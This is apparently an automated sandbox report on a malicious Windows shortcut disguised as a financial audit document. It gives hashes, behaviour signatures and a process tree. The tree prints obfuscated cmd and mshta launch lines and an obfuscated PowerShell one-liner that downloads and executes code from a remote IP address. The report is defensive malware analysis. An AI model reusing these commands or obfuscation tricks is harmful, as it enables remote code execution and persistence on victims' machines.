Analysis
-
max time kernel
63s -
max time network
75s -
platform
windows7_x64 -
resource
win7 -
submitted
16-07-2020 16:09
General
-
Target
AKT-FinAuditService.docx.lnk
-
Size
27KB
-
MD5
1425616dd18b99224472948a0442fda8
-
SHA1
406d63ededaf84274793601e420dd4c1b7a23bfc
-
SHA256
769ad49c1d893c2965e25f180288e649d42b89a0b7588f63ad7c4bdba1105537
-
SHA512
835fc2c4f2874c9faf155352405e7a976b51dbda62a13d484cedcd989c894a169ac8054555c8d91b3833aa8a7f2c52d145904db1ce6224743744dfc27d15209f
Score
8/10
Malware Config
Signatures
-
Blacklisted process makes network request 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
-
Deletes itself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 41 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\AKT-FinAuditService.docx.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /v /c set m=m^s^h^ta && set a=AKT-F^inAudit^Service.^docx.l^nk && if exist "!cd!\!a!" (!m! "!cd!\!a!") else (!m! !temp!\Temp1_А^ктСве^рки.z^ip\!a!)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta "C:\Users\Admin\AppData\Local\Temp\AKT-FinAuditService.docx.lnk "3⤵
- Suspicious use of WriteProcessMemory
- Deletes itself
- Modifies Internet Explorer settings
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AKT-FinAuditService.docx"4⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c while(!(.("""{0}{1}{2}"""-f ("""{1}{0}""" -f 'st-','Te'),("""{2}{1}{0}""" -f 'ec','onn','C'),("""{1}{0}"""-f'n','tio')) ("""{1}{2}{0}""" -f ("""{0}{1}"""-f("""{1}{0}"""-f'.c','le'),'om'),'g','oog') -q)) {&("""{1}{2}{0}{3}""" -f ("""{0}{1}""" -f("""{0}{1}""" -f 'a','rt-'),'Sl'),'S','t','eep') -s 5} .("""{1}{0}""" -f'ex','i')(.("""{2}{1}{0}""" -f't',("""{1}{0}"""-f 'jec','Ob'),("""{0}{1}""" -f'Ne','w-')) ("""{0}{4}{1}{2}{3}"""-f ("""{1}{0}""" -f 'W',("""{0}{1}"""-f 'Net','.')),'C','li','ent','eb')).("""{3}{4}{1}{2}{0}"""-f'ing',("""{1}{0}"""-f'lo','wn'),("""{1}{0}""" -f 'Str','ad'),'D','o')."""In`Vo`kE"""(("""http://45.61.138.170/decide.php"""))4⤵
- Blacklisted process makes network request
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\AKT-FinAuditService.docx
-
memory/740-3-0x0000000000000000-mapping.dmp
-
memory/784-2-0x0000000000000000-mapping.dmp
-
memory/1316-0-0x0000000000000000-mapping.dmp
-
memory/1408-1-0x0000000000000000-mapping.dmp
-
memory/1408-4-0x0000000005D50000-0x0000000005D73000-memory.dmpFilesize
140KB